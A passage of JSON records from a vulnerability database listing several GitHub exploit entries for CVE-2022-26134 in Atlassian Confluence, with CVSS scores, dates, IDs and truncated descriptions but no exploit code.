3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T13:51:39", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-06T01:29:57", "id": "AB8EAC0D-269A-5799-885F-B0EA2A33792C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:40", "description": "# CVE-2022-26134\nAtlassian Conflue...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T06:57:02", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-01-30T13:08:13", "id": "18A205C9-C2EE-55CC-9BFD-4054390F94E9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:42", "description": "CVE-2022-26134 poc\r\n\r\n\u58f0\u660e:\u8be5POC\u4ec5\u4f9b\u4e8e\u5b66\u4e60\u4e13\u7528\uff0c\u7981\u6b62\u4e00\u5207\u8fdd\u6cd5\u64cd\u4f5c\uff0c\u5982\u679c\u8fdb\u884c\u6076\u610f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T13:41:25", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-05T13:44:25", "id": "53CC55D8-983C-5FA9-AE81-D20750A6612E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:53", "description": "# CVE-2022-26134 PoC\n\nConfluence Server and Data Center - CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T10:44:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-03-10T12:12:43", "id": "423DF4D5-60AF-5663-B196-2A67DD13D226", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:54", "description": "\u6279\u91cf\u9a8c\u8bc1 CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": &quo